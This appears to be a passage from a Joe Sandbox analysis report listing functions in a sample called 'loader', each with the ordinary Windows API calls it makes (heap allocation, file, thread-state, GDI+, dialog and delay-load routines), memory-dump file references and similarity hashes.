              Function 00128518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0012C13D,00000000,?,001267E2,?,00000008,?,001289AD,?,?,?), ref: 0012854A
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 7eeb0ec7819440e2c477a40a43ec5991582a20ea8c768be924e3401fcaed29ef
              • Instruction ID: 0e822f74ce30d17e46469071e67835a661bbb5d97be947685b715ae21c9db9bb
              • Opcode Fuzzy Hash: 7eeb0ec7819440e2c477a40a43ec5991582a20ea8c768be924e3401fcaed29ef
              • Instruction Fuzzy Hash: BBE0E5216431315AEB312A69BC00B5B7BCCDF513B0F150210EC14E2081CF64CC7085F5
              Function 0010A4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
              Download Yara Rule
              APIs
              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0010A4F5
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: CloseFind
              • String ID:
              • API String ID: 1863332320-0
              • Opcode ID: b448a999aa773e6f0fe9661f200f6922c85f767b05c097c54743b174ea2fe55a
              • Instruction ID: 77daaef238262c20b0c3e436f5809c63738221f3da1f528b9542906494ce3fd8
              • Opcode Fuzzy Hash: b448a999aa773e6f0fe9661f200f6922c85f767b05c097c54743b174ea2fe55a
              • Instruction Fuzzy Hash: 17F0E935008380AACA225B7848047C77B94AF26371F04CA09F1FD421D1C3F414C59723
              Function 0011067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
              Download Yara Rule
              APIs
              • SetThreadExecutionState.KERNEL32(00000001), ref: 001106B1
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ExecutionStateThread
              • String ID:
              • API String ID: 2211380416-0
              • Opcode ID: 30cac51f398bf293659f5faf164af4ee342222b144fb050e3d896d161f980cf0
              • Instruction ID: bbee3b07f375d96bb65813651b4be51579efd4295cd606cc5c398369c81ac4c8
              • Opcode Fuzzy Hash: 30cac51f398bf293659f5faf164af4ee342222b144fb050e3d896d161f980cf0
              • Instruction Fuzzy Hash: 57D02B346101103EC62F3325E8057FE1A060FCB720F080031B65D139D78BD708CA82F2
              Function 00119D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
              Download Yara Rule
              APIs
              • GdipAlloc.GDIPLUS(00000010), ref: 00119D81
                • Part of subcall function 00119B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00119B30
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Gdip$AllocBitmapCreateFromStream
              • String ID:
              • API String ID: 1915507550-0
              • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
              • Instruction ID: b1369db7bb349269a452f854a402b88a64f76c97600f5374e564495f7bab19f3
              • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
              • Instruction Fuzzy Hash: 04D0A73061820C7ADF48BBF09C229FA7BA9DB10300F004035BC1886141FF71DE90A261
              Function 00109989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
              Download Yara Rule
              APIs
              • GetFileType.KERNELBASE(000000FF,00109887), ref: 00109995
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: FileType
              • String ID:
              • API String ID: 3081899298-0
              • Opcode ID: 0180c38c8c0b94184666aeebfee18e5cccd08fbe74ede89b642c98bae7a6fb3e
              • Instruction ID: 8d97a343fddb69041262b5b010272cf156abba155fb317a914767522fa83dd89
              • Opcode Fuzzy Hash: 0180c38c8c0b94184666aeebfee18e5cccd08fbe74ede89b642c98bae7a6fb3e
              • Instruction Fuzzy Hash: BBD01231111141A5CF2546384D1909A7751DB8337EB38C6A8E0B5C40E2D767C843F581
              Function 0011D41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
              Download Yara Rule
              APIs
              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0011D43F
                • Part of subcall function 0011AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0011AC85
                • Part of subcall function 0011AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0011AC96
                • Part of subcall function 0011AC74: IsDialogMessageW.USER32(0001040A,?), ref: 0011ACAA
                • Part of subcall function 0011AC74: TranslateMessage.USER32(?), ref: 0011ACB8
                • Part of subcall function 0011AC74: DispatchMessageW.USER32(?), ref: 0011ACC2
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Message$DialogDispatchItemPeekSendTranslate
              • String ID:
              • API String ID: 897784432-0
              • Opcode ID: 792e3e1b7c3635865e5e5abdb8ebe2f5cec299772bc67f1fb5e6876336cc9eb4
              • Instruction ID: 496cfe07c337e79d3a7fdc18bd5b2cab0d5e9fd0ce21154c9c28e377e10edd1a
              • Opcode Fuzzy Hash: 792e3e1b7c3635865e5e5abdb8ebe2f5cec299772bc67f1fb5e6876336cc9eb4
              • Instruction Fuzzy Hash: 12D09E31144300ABD6152B51CE07F0F7EA6AB99B04F404954B344754F286B29D61AB16
              Function 0011D891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: b7d29f271e36516334730b06ad0eb2475ccbab2801ef227c91ef26276e61964f
              • Instruction ID: bbd9132cf1c326714e567f613ed7977496678de68e6b2919ae573810b3bbb88e
              • Opcode Fuzzy Hash: b7d29f271e36516334730b06ad0eb2475ccbab2801ef227c91ef26276e61964f
              • Instruction Fuzzy Hash: 84B0129526C7027DB50C21407D92C7B020CC4C3B10371453AF10AF00C0F7505CCA4431
              Function 0011D8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: c874270200b10f3be45c936b37f3e2c55d4e4090533a6f3797d541ab0ac2a737
              • Instruction ID: e4a67acee12ca2117b932ac27257afdbe72fe5e1f37dc0ced96db79cdae83bfc
              • Opcode Fuzzy Hash: c874270200b10f3be45c936b37f3e2c55d4e4090533a6f3797d541ab0ac2a737
              • Instruction Fuzzy Hash: 62B012D126C4026CB10C61447D42D76020CC4C3B10370C03AF50AF01C0F7505C8B0431
              Function 0011D8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: fe899982adefd502aa5ca734d2d450a6d0057fb8b252f83233a80db832f9ecba
              • Instruction ID: 49fb64212b426374a21316c31e2804871051d3051758492811ca1708069d60d3
              • Opcode Fuzzy Hash: fe899982adefd502aa5ca734d2d450a6d0057fb8b252f83233a80db832f9ecba
              • Instruction Fuzzy Hash: 7EB0129526C5026CB10C61447D82D7B020CD4C2B10370403AF10AE00C0F7505C860531
              Function 0011D8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 889bd565d5a8d92320ea464ecd90e842be1bc9790646b1e1209902e3b3536fc6
              • Instruction ID: 63c56e8964bb1f64ed8f8e51c667d5066bd80471bcb47a378658d09c925892a7
              • Opcode Fuzzy Hash: 889bd565d5a8d92320ea464ecd90e842be1bc9790646b1e1209902e3b3536fc6
              • Instruction Fuzzy Hash: 7EB012A126D4026CB10C61447D42D76020CC4C3B10370803AF50EE00C0F7505D8A0431
              Function 0011D8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 08ffe26a3ae03bf0fa5df9626e1b5276e20c17969afab6c9a14a0fb1a22bc55d
              • Instruction ID: 3b1ffc7717c49c2250487e429af8602fb1e15743b9cfdc1152ca779384ff2a2d
              • Opcode Fuzzy Hash: 08ffe26a3ae03bf0fa5df9626e1b5276e20c17969afab6c9a14a0fb1a22bc55d
              • Instruction Fuzzy Hash: 43B012D127C5026DB14C61447D42D76020CC4C2B10371813AF10AF01C0F7505CCB0431
              Function 0011D8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: cb090a27360dae40ce75d8a386a1ddac053423caa978422371c38a455048c3a7
              • Instruction ID: 56980e7c4e194d1b75b08736b0e6e1960fdec14092348832725fa29617377ba7
              • Opcode Fuzzy Hash: cb090a27360dae40ce75d8a386a1ddac053423caa978422371c38a455048c3a7
              • Instruction Fuzzy Hash: 9AB012D126C4026CB10C61447E42D76020CC4C2B10370803AF10AF01C0F7605D9F0431
              Function 0011D8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: a866979ec95abd67cb9e9f14eb3165fa83fe422ac68a12e3b0dc0b1f2e9c0414
              • Instruction ID: a95287b94676043d0e3fae8f9e75338c8aa0ec3528f9753ed306e9d2dfdd8c5e
              • Opcode Fuzzy Hash: a866979ec95abd67cb9e9f14eb3165fa83fe422ac68a12e3b0dc0b1f2e9c0414
              • Instruction Fuzzy Hash: E0B012A126D4026CB10C61447E42D76020CC4C2B10370403AF10EE00C0F7505E870431
              Function 0011D8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: a44e0c7292f4ecf35d5faab29a497de455e68f0daa820522266d95e1b4095291
              • Instruction ID: 5c1c408f5869216634f58dde70ce75e5c24aded34470ad1e2d7aca78dd194c46
              • Opcode Fuzzy Hash: a44e0c7292f4ecf35d5faab29a497de455e68f0daa820522266d95e1b4095291
              • Instruction Fuzzy Hash: 63B012A126D4026CB10C61457D42D76020CC4D2B10370403AF10EE00C0F7505D860431
              Function 0011D8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 007d86bd9bcad09d3c377884b05229a885af827ecda6c38bdafd6f3a14972bbd
              • Instruction ID: 45174d6113de3a17e572d4c61b8d43f5133df0d50b6e4ee3d2a675f499849b9d
              • Opcode Fuzzy Hash: 007d86bd9bcad09d3c377884b05229a885af827ecda6c38bdafd6f3a14972bbd
              • Instruction Fuzzy Hash: 1CB012A126D5026DB14C61447D42D76020CC4C2B10371413AF10EE00C0F7505DC60431
              Function 0011D910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
